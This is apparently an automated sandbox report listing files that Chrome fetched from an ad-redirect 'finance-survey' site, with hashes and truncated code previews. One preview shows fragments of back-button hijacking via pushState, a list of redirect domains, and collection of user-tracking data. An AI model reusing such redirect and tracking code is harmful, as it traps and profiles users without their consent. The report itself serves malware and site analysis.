                                                                                                          SHA1:B3460CB757B6982730473630AC637DA98A38B5F3
                                                                                                          SHA-256:BD2D63C5AFDEC719E0D8E35458A0F36C4615D5D3164B4FA2C943D29CFB64EB2D
                                                                                                          SHA-512:D9BD3D1F555EB7E59E81DE83F6CB1153561C8C94FAA470BE1766B39655597047787A28DBE0F2023C3A5912E8848407D7FE2A052DF61583C25942CD8FFCA30AFA
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[17220],{75552:function(n,t,r){r.d(t,{i:function(){return o}});var o="-apple-system, Roboto, Helvetica, sans-serif"},66236:function(n,t,r){var o;r.d(t,{O:function(){return o}}),function(n){n.LIGHT="light",n.DARK="dark",n.DARK_CLOSE_ICON="dark_close_icon",n.BLUE="blue"}(o||(o={}))},84277:function(n,t,r){var o;r.d(t,{V:function(){return o}}),function(n){n.LEFT_BOTTOM="left_bottom",n.RIGHT_BOTTOM="right_bottom",n.FULL_WIDTH_BOTTOM="full_width_bottom"}(o||(o={}))},17220:function(n,t,r){r.r(t),r.d(t,{COOKIE_URLS:function(){return H},default:function(){return K}});var o=r(56753),i=r(12139),e=r(66236),u=r(84277),c=r(29754),f=r(92228),a=r(93888),d=r(75552);function l(){var n=(0,f.Z)(["\n right: 0;\n "]);return l=function(){return n},n}function s(){var n=(0,f.Z)(["\n left: 0;\n "]);return s=function(){return n},n}function p(){var n=(0,f.Z)(["\n left: 0;\n right: 0;\n "]);return p=function(){return
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (6289), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6289
                                                                                                          Entropy (8bit):5.397253576176072
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:K7U1UoImHvbQ8FfXZ0Y92uZ2Dwi3oP8hQwDIRwy1GLFgKZVzYMeIfIa:EulImU89pci2ceoEawsR9MLFhoGQa
                                                                                                          MD5:D6DE2B1FC854FE26AA50F2BA1B6C2F3C
                                                                                                          SHA1:080C6ECE45CD4D8C3FD70975166F345DD823B65A
                                                                                                          SHA-256:8EC41CDFF13D0E98B23AB477F2CB80AA0576B2E0F37CE1AC9A30608562209D0D
                                                                                                          SHA-512:3D49B5765ACD16CAF6DDB1A0DF39815F3F8AF70F40B28DD60FA41B756A6D1E77AA92D87146D4FF511697BAECE465316F1C286EB59F5ECB2B4F793AFA90A4261D
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[68249],{43601:function(n,e,i){i.d(e,{N:function(){return r}});var t,o=i(29505),r=function(n){return parseInt(null!==(t=(0,o.ej)(n))&&void 0!==t?t:"0",10)}},50656:function(n,e,i){i.d(e,{N:function(){return f}});var t=i(12139),o=i(61656),r=i(83216),a=i(71961),u=i(35147),s=i(21818),c=i(51659),l=i(94397),d=i(19495),v=["coajutoa.com","furgoomi.com","kabortot.com"],f=function(){var n=(0,t.useState)(0),e=n[0],i=n[1],f=(0,t.useState)(!1),N=f[0],U=f[1],b=(0,d.bp)().state,E=b.oaid,k=b.userData,h=b.passParamToParams,_=b.userAgentData,p=k.subId,m=_.data.platformVersion,w=(0,l.k)(m);(0,t.useEffect)((function(){U(function(){var n=navigator.userAgent;return/iPhone|iPad|iPod|Macintosh|Mac OS X/i.test(n)}())}),[]),(0,t.useEffect)((function(){var n=setInterval((function(){i(0)}),1e4);return function(){return clearInterval(n)}}),[]);return{initBack:function(n){var t;if(b.back.isEnabled)if(e>12&&N)(0,a.yN)("initBack: Too much pushStateT
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):109702
                                                                                                          Entropy (8bit):5.306660026357081
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:5V8ZH0wowcd8HOlXMGSCJtIDqsSZHRTUR:3WHH+32qnT2
                                                                                                          MD5:FA92E582B2C89BE329FBC8AC7170C6AC
                                                                                                          SHA1:BF03008752166780239D14094615F3D6F01D52AC
                                                                                                          SHA-256:FADD974A6921E24C69B0F37AD3CDC0F67424923522F2102B988FE11EC99A763F
                                                                                                          SHA-512:0CDB89F09E5EB5D6E0ECF60221B50345CFC8311F01FEDC025111B67798F94976B0D894C657172509B5DDE7EE85C32F3255B3AE9D0DCE721CD2D49392C4BEB15C
                                                                                                          Malicious:false
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[40179],{5651:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n}},47568:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){if(Array.isArray(e))return e}},61476:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){if(Array.isArray(e))return a.default(e)};var n,a=(n=r(5651))&&n.__esModule?n:{default:n}},96385:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){if(void 0===e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}},18282:function(e,t){"use strict";function r(e,t,r,n,a,o,i){try{var u=e[o](i),c=u.value}catch(s){return void r(s)}u.done?t(c):Promise.resolve(c).then(n,a)}t.Z=function(e){return function(){var
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3176), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3176
                                                                                                          Entropy (8bit):5.402925707154902
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:sEbNLMFiIWb9Y4JBGppOKWcciiWk3oesQvNS:vbGp4Y4JwpeWyX1S
                                                                                                          MD5:3A01D5F5C91C211EF0E02B9E0B6EA2E8
                                                                                                          SHA1:58069696D2E6529D21420413BE807E9067938699
                                                                                                          SHA-256:380B6D125A72EE449EC00271F510858F85123F6D8DA7F7C0BD7397274C2ACEDD
                                                                                                          SHA-512:080F5FDFA91942BC9146853522C368B01A70A5BC4D6609A47B13FBF7F8569DDDC8FA61C83E35809BECAA3174D04DDF72F4C46486CD9E876626B6142A92E879C2
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[80086],{80086:function(t,a,e){e.r(a);var r=e(98788),n=e(22970),o=e(56753),s=e(12139),i=e(18394),l=e(17969),c=e(71961),u=e(52929),d=e(35147),p=e(72181),f=e(53444),h=e(51659),m=e(19495),v=e(95798),g=e(34406);a.default=function(t){var a=t.zonesIpp,e=(0,m.bp)(),P=e.state,y=e.dispatch,_=P.oaid,b=P.userData,I=P.passParamToParams,N=P.userAgentData,k=b.subId,w=(0,s.useState)(null),x=w[0],z=w[1];return(0,s.useEffect)((function(){if(!a||x||0===a.length||0===_.length||N.shouldCollectData)return a||(0,c.yN)("/rotate: IPP zones are undefined"),a&&0===a.length&&(0,c.yN)("/rotate: IPP zones are empty"),x&&(0,c.yN)("/rotate: Data is already fetched"),0===_.length&&(0,c.yN)("/rotate: oaid is not ready yet"),void(N.shouldCollectData&&(0,c.yN)("/track: os_version is still to be identified"));var t=a.map((function(t){return(0,h.pR)(t.zones)})).join(";"),e=function(){var a=(0,r.Z)((function(){var a,e,r,o,s,u;return(0,n.__generator)(this,
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (387), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):387
                                                                                                          Entropy (8bit):5.854985535017326
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrgcXr4eD9lLjH8TduNoiJxHHNaSWGshI2Jz7m+bust1IdiQLf:+dbjeehlLD8ICCGJJXajdiQT
                                                                                                          MD5:ED7D331FB16AFAD772733F74A3F0748A
                                                                                                          SHA1:0C29D0F3DA8CDD61B9C83B626ABE7E164D9B3938
                                                                                                          SHA-256:A78559BE932BF323D012B0F3EDDF31E1877CB7757FBA7C7B8218E01DD9168C9D
                                                                                                          SHA-512:8EA81EBACB045FF93040C01E6075D7CBDCA60CEAFBF1DB9ED38AB6C954357223E8D36DCFB386ED3E7E1CC83DE75AB2732E398154D9AED2DCCEC3E0904DAF92FC
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/20a35a44b4f8b20a-1736072686539.c29d864a1f4963e0.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[39807],{39807:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_4.459e7d96.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlwAAABXRUJQVlA4IFAAAADQAQCdASoIAAgAAkA4JQBOgCPtuar0wAD+7SqVWbl09bUkF+P+Jn33Y4i8vsy57g564Z93RA7VeWszgsFIpzsSfwFt1VneZwEQj95pRoAAAA==",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (372), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):372
                                                                                                          Entropy (8bit):5.789401167863494
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrJQneD9lLjHti7oNoiJxHHNasH1a7kCML/n5CpxhldiQLf:+dbjynehlLDtisCCGsVVnIpDldiQT
                                                                                                          MD5:9F582ADDDABEAFBA4954FEC872A4B192
                                                                                                          SHA1:682805CE427701006B099CB0DC7C0A7CB3F29216
                                                                                                          SHA-256:2F51A4E59391AAB31E95422C33774E285DD05E6AEB634B18F74935AEA5CBF369
                                                                                                          SHA-512:129BBB068F0E69746D30EBB43520FB282A042579B094AB9005F1451E48BB7BB84D036C86A9D7C555FD3D62EFD165B5AC17CD56F3280238604417F3B7E9CD8785
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/ae2aa467dd9af961-1736072686539.fa66633a9d1758bd.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[84487],{84487:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_33.ba468d11.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlIAAABXRUJQVlA4IEYAAADwAQCdASoIAAgAAkA4JYgCdAEfhIMbhAAA/vLj9GPnzr/WUn3KpqlRSwLnTlGRJRuKHfIzqHlVpqqnr8btDHRFrR2EAAAA",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:C source, ASCII text, with very long lines (10752), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10752
                                                                                                          Entropy (8bit):5.234396797634892
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Y3nvQg2qij6JdwvhHkx98r3H6FaGm6/ceNsB+1EqaGn7pv:Y/QXSjwveKK/KGh
                                                                                                          MD5:35FEE35B460CF851BDF3BEECB8B35F5A
                                                                                                          SHA1:F6AF853CBDFB476165846933AADA6CC3B1419022
                                                                                                          SHA-256:8670480720BC1D26B090CC475660907E07D42EA2DD14CBB860CA04ADD28CE9CC
                                                                                                          SHA-512:F739EBF05046FD406E6348686272D0E963CF97AD0AF91000C5EE2570D412899C134FBB7539C675A8E18AF611C4A760B88984A0C1D68F9007FEEA4B502425B81A
                                                                                                          Malicious:false
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[56901],{56629:function(__unused_webpack_module,exports){"use strict";var __awaiter=this&&this.__awaiter||function(e,t,n,r){return new(n||(n=Promise))((function(o,a){function i(e){try{s(r.next(e))}catch(t){a(t)}}function u(e){try{s(r.throw(e))}catch(t){a(t)}}function s(e){var t;e.done?o(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(i,u)}s((r=r.apply(e,t||[])).next())}))},__generator=this&&this.__generator||function(e,t){var n,r,o,a,i={label:0,sent:function(){if(1&o[0])throw o[1];return o[1]},trys:[],ops:[]};return a={next:u(0),throw:u(1),return:u(2)},"function"===typeof Symbol&&(a[Symbol.iterator]=function(){return this}),a;function u(u){return function(s){return function(u){if(n)throw new TypeError("Generator is already executing.");for(;a&&(a=0,u[0]&&(i=0)),i;)try{if(n=1,r&&(o=2&u[0]?r.return:u[0]?r.throw||((o=r.return)&&o.call(r),0):r.next)&&!(o=o.call(r,u[1])).done)return o;switch(r=0,o&&(u=[2&u[0],o.va
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (41027)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):481611
                                                                                                          Entropy (8bit):5.525163267905917
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:H6y1586NSKo3wJADIoaEPLKTdQiEmFTgsb6Et0//Uuhwnyk:am86pcIrEzKTQuttI72
                                                                                                          MD5:2560EE19281892D52123113EB3249410
                                                                                                          SHA1:FCA4FE0A2CF5CD2D4256EDE69946468AB075D61F
                                                                                                          SHA-256:82E1D562D9944F7EA8DE3F8B742CAE55801472705AA581B480D3F875CA5EDAA5
                                                                                                          SHA-512:5658163CD5FEDCDC1735C31BF75F0117979E26E6440E47F909ED29EBA095799502707931492691BAAB0E34EF4FD1AB1CBF94DFC10812DB93016183D8C3F40D8A
                                                                                                          Malicious:false
                                                                                                          URL:https://bohlepropiedades.com/includes/assets/index-qoqlwAed.js
                                                                                                          Preview:var d0=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var V2=d0((hn,vn)=>{(function(){const t=document.createElement("link").relList;if(t&&t.supports&&t.supports("modulepreload"))return;for(const o of document.querySelectorAll('link[rel="modulepreload"]'))r(o);new MutationObserver(o=>{for(const i of o)if(i.type==="childList")for(const a of i.addedNodes)a.tagName==="LINK"&&a.rel==="modulepreload"&&r(a)}).observe(document,{childList:!0,subtree:!0});function n(o){const i={};return o.integrity&&(i.integrity=o.integrity),o.referrerPolicy&&(i.referrerPolicy=o.referrerPolicy),o.crossOrigin==="use-credentials"?i.credentials="include":o.crossOrigin==="anonymous"?i.credentials="omit":i.credentials="same-origin",i}function r(o){if(o.ep)return;o.ep=!0;const i=n(o);fetch(o.href,i)}})();/**.* @vue/shared v3.5.13.* (c) 2018-present Yuxi (Evan) You and Vue contributors.* @license MIT.**//*! #__NO_SIDE_EFFECTS__ */function Us(e){const t=Object.create(null);for(const n of e.split(","))t[n]=1;re
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1843), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1843
                                                                                                          Entropy (8bit):4.924487736347028
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:NLr2BM/YoRifXe7aXnQstpx0EB0vetET58hHLjD+NxrMyLQESmTywRez/rSsJjes:FUw8ewZtpx0XeH3D+NGeQE3RezrnNm8
                                                                                                          MD5:64B2B4FA42C7D558D735E2CD28ECF88A
                                                                                                          SHA1:03D6DA6E55B1201B51689590520DA495A9233D67
                                                                                                          SHA-256:2FDB3CE9CCBA8355040E5BA3DFB2283194ACBA81858943B5D88F70030DBB71EA
                                                                                                          SHA-512:870EBD1188DF4E368F9DE2B7536E5647DB6D1040BDC29CB46B227A6D3A917AB4FF710813246F79A11C5692035798D24F7085F0D8C1763E2D3C0CEEA776FF4B69
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/css/0bc0cde260d08b97.css
                                                                                                          Preview:/*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}main{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}img{border-style:none}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[ty
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):10144
                                                                                                          Entropy (8bit):7.963507291734976
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ZLciCFuUt5pK4OYBBuDKwgUtRqwEgawzYxvgfuQUycGhA2UuT:YZtK4OYqTxRqw/awqQJuuT
                                                                                                          MD5:DE769CA327095EA747B11295975657C7
                                                                                                          SHA1:B102647769A0385A5AB7BF9E3B832FAE50DAE706
                                                                                                          SHA-256:04CCBA041DC4136E797C1E9B7C9608F47DAA9101A74FB276054DE8CFFBC90F27
                                                                                                          SHA-512:98BE6D9813D4539F4C19611B0FC4E94FA315FF2768F7115A6E1454A5EE2749EDA247D1CA9AC02A4B5195972480A48280A9AFC57AFCC3B64607A8B9D52087CE31
                                                                                                          Malicious:false
                                                                                                          URL:https://imagizer.imageshack.com/img923/6111/MRpIWd.jpg
                                                                                                          Preview:RIFF.'..WEBPVP8X...........`..VP8 .&..P....*..a.>.Z.O'%(&...9...en....a.*..}..........=q.n.#..?_........w..?..........?....?.O...?u_.?.>......R.A........O.+......k.....o.?.....t...T.%..............-B=..~.~...}.> .........w.....?.......Y.G[..R...}.Up.._....5/.......c.....;.........[.Mu7.$..b....c.....;..6..8#.K....S.Y.2,.6...c.....;..v?|..9....#....>..|*..T..3.Pg.[.....%#zL.Pg..A...>..|*..T.*s8T..3.Pg..kv.>.G%.$6....-(...tbK.8..=..r{Z./........L.^k..rs....iv.3..Y...c'R....>...I..^.N2....9o...".9...q[.d.4...".>!......>&3.xx#s1..!.G.U....\...Z*....P=0b.w.(.gt...1..&...A.W.I...........W......)i....yI#........N..UU..,\..!...5&.01N...o.@v..k..Vo.5.S..J.2.w..c.Z,.......N.-..n....1.w....aK..X.........v..1..-.._..`|..}'...;.Yr..u..E....)..B.m..X;.i..M6w.Jm....C.Q1..7..Q...!.....o...3...<q..h....).........y...v....DX.Z....f......Nudpq.a..p^|;...*..x............O?....Wh&..L!LR1tG..~..j.3(H..{N.UT...[..y{2.&....C.w*.~VZ....:....,._....h.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (388), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):388
                                                                                                          Entropy (8bit):5.853471974611916
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrgSCSaeD9lLjHMlONoiJxHHNaSWoYsr9xQRiOZBIdiQLf:+dbjXC7ehlLDMcCCGy3QUdiQT
                                                                                                          MD5:3428A745D1966D35F5B166E21104160B
                                                                                                          SHA1:5AA78D89BD26E8E5DD77889CBC4D4734DA8F9176
                                                                                                          SHA-256:4E33C96E78A9108E78BB9064FCA8ECE4C2AFA2F63C10BDF5DFCDEB34AF08967A
                                                                                                          SHA-512:892412A5C32AF36AB0511CF9FB2DDF61CE3C95FBB0A5F6598E8EF4E33B653DAEA52F527903572ACCA6A988BC979E8E3D8233FD67946082CCF66159F1FBFCDF02
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/ffa1a9ad1af72fff-1736072686539.a773b898c1059c87.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[37520],{37520:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_13.99d105c0.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlwAAABXRUJQVlA4IFAAAACwAQCdASoIAAgAAkA4JQBOgB6Q9drgAP7vr7dqpes024OvrHuIR7QkI0kbrX4ZKeuadKE7rxe5YpwArZ1HGNLPdKU2HzjKud73+JWL5gAAAA==",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (378), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):378
                                                                                                          Entropy (8bit):5.824406219527274
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzricQaEeD9lLjHMAHsNoiJxHHNaCHZRkClkkCgWFkKvtofLOildiQLf:+dbjicFEehlLDMAMCCG/gqjt2hldiQT
                                                                                                          MD5:59CA1E955E8D6AD1E54609519D4509A2
                                                                                                          SHA1:3B394B7452235BF18C34C8053C56C655690F9E90
                                                                                                          SHA-256:3C9985CEFCB43A24A8DE56B63F84648E05584F84949EFF68AC8E7095B52422AE
                                                                                                          SHA-512:D1E2587581F457180B59BCCD43B61A792727CECD7FBA279F8FD530A8C602E31C4E7E7BBCBA8B3D902CE3E8596332031E2A9C78C467A6C5874D8B489FB5215C2D
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/a61972911ad09d00-1736072686539.d5eb9d66276548f8.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1955],{1955:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_28.094ddc20.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAAAQAgCdASoIAAgAAkA4JYgCdLoAArqxC4yEAP7SmFoQ+Yr4o3U7s1YzAg9R2DcqxswQnizmYyi1Yuq0/W5MoHp15TgZN5FIsroUAAAA",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:C source, ASCII text, with very long lines (10752), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):10752
                                                                                                          Entropy (8bit):5.234396797634892
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Y3nvQg2qij6JdwvhHkx98r3H6FaGm6/ceNsB+1EqaGn7pv:Y/QXSjwveKK/KGh
                                                                                                          MD5:35FEE35B460CF851BDF3BEECB8B35F5A
                                                                                                          SHA1:F6AF853CBDFB476165846933AADA6CC3B1419022
                                                                                                          SHA-256:8670480720BC1D26B090CC475660907E07D42EA2DD14CBB860CA04ADD28CE9CC
                                                                                                          SHA-512:F739EBF05046FD406E6348686272D0E963CF97AD0AF91000C5EE2570D412899C134FBB7539C675A8E18AF611C4A760B88984A0C1D68F9007FEEA4B502425B81A
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.js
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[56901],{56629:function(__unused_webpack_module,exports){"use strict";var __awaiter=this&&this.__awaiter||function(e,t,n,r){return new(n||(n=Promise))((function(o,a){function i(e){try{s(r.next(e))}catch(t){a(t)}}function u(e){try{s(r.throw(e))}catch(t){a(t)}}function s(e){var t;e.done?o(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(i,u)}s((r=r.apply(e,t||[])).next())}))},__generator=this&&this.__generator||function(e,t){var n,r,o,a,i={label:0,sent:function(){if(1&o[0])throw o[1];return o[1]},trys:[],ops:[]};return a={next:u(0),throw:u(1),return:u(2)},"function"===typeof Symbol&&(a[Symbol.iterator]=function(){return this}),a;function u(u){return function(s){return function(u){if(n)throw new TypeError("Generator is already executing.");for(;a&&(a=0,u[0]&&(i=0)),i;)try{if(n=1,r&&(o=2&u[0]?r.return:u[0]?r.throw||((o=r.return)&&o.call(r),0):r.next)&&!(o=o.call(r,u[1])).done)return o;switch(r=0,o&&(u=[2&u[0],o.va
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):264
                                                                                                          Entropy (8bit):7.010495837839042
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:wk5ZaWS08/WdhOAs62IfG8Vv1e9AtBaup:wZjW/OAzeIv0Ktf
                                                                                                          MD5:606085E7A74FD169DA34F9FCB43AD12D
                                                                                                          SHA1:77226A50488FB48256D36F1810A136B69D635F74
                                                                                                          SHA-256:DF20F4C1D87CB10514A6D526DDE70759334705D90A909DF0E6CB130061CE1EA5
                                                                                                          SHA-512:C86B56D3733B3C6C6E50C17629DC44438730D0AE1D75F4330683EEDA0623A522AC9DE55BC47B1353ABE77C70C01650CFB142740E55E6E504CBD053A0FA85DF3F
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/media/comments-empty-user.c37f32b6.webp
                                                                                                          Preview:RIFF....WEBPVP8 .........*d.d.>.`.M(&#.-.x....g....m...A%].{n..X.j..B......%N......U....9...^...H.....9t.....dlJ.L.@.E...8.......LYD....G8s?..G..F....S..|5./.'...X.8g....T}FJP.5....jF...]^.....g.1+~......hk.....9@.ZdX.H...Hy........._.6a43S......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (52719)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):97691
                                                                                                          Entropy (8bit):5.925568024675031
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:IJU3graVw/LAXRl2KtotCEPqsa92RduJU3gVwAFP:oaVwUXRQrCEPqsfNOP
                                                                                                          MD5:65D9724093367E106099780B5FF5939B
                                                                                                          SHA1:A5D67F3CAB4552A67D29C0E1E8DA4F3CEBE89FD7
                                                                                                          SHA-256:76E667AB434014BFD6B2DB66246526215D00B00BEF7B08E837898D56B3FA7B39
                                                                                                          SHA-512:23505E749083AA6B05BAB4C543A2CB504BE65E27589EC94B640EB97DB106A9EB76F54CE7365EF302F6A7B4BD5D3328E5E18225BC76312A5BF77F28E7D8E018F3
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/finance-survey/272/?svar=1736161758&ssk=7cd32637808ffb7eb68676c4facb26c7&ssk2=6eef4467b47effe6659448a630f4cafb&s=900090192959910233&var=615-538bd0d9&ymid=2de718&z=8645117&var_3=M7456757949717807127&rdk=rk3
                                                                                                          Preview:<!DOCTYPE html><html lang="en" data-version="v0.6.257-do"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><style data-styled data-styled-version="6.1.13">.jNkXpG{height:100%;width:100%;margin:0;background-color:#eee;border-radius:3px;background:linear-gradient(. to right,. #585858. 8%,. #404040. 18%,. #585858 33%. );background-size:80rem 100%;animation:ORedh 1.5s infinite linear forwards;}/*!sc*/..fMSXWr{height:1.5rem;width:80%;margin:0;background-color:#eee;border-radius:3px;background:linear-gradient(. to right,. #585858. 8%,. #404040. 18%,. #585858 33%. );background-size:80rem 100%;animation:ORedh 1.5s infinite linear forwards;}/*!sc*/..jwiLxb{height:2.3rem;width:100%;margin:0;background-color:#eee;border-radius:3px;background:linear-gradient(. to right,. #585858. 8%,. #404040. 18%,. #585858 33%. );background-size:80rem 100%;animation:ORedh
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5922), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5922
                                                                                                          Entropy (8bit):5.409393426145938
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:lrU9LOCxmUblWmReE/eEzeEhX7KMeEQmeEUdveE5FeE5sOeE55eE0qbQk4AdUz9C:lrslxmUxxp/pzpN7KMpBpuvpHp7pPpBp
                                                                                                          MD5:65063C6FEB5AB7A615FD840B529A6E85
                                                                                                          SHA1:16527FC7D8E0F16A589E2CD2D28A9BACD674120A
                                                                                                          SHA-256:18B358474B3575BF20CA8A785837131819E4F00ABB18930094D8FD51B2032973
                                                                                                          SHA-512:EFDC4CCF5CD0DD01AD669472FD0685C48DC8B73A470F06BB8B3F741161B9BC1C104A4277321A02B7B61938711755F5309FFD65ABD2CA28CC87A58AE56B9D9A4A
                                                                                                          Malicious:false
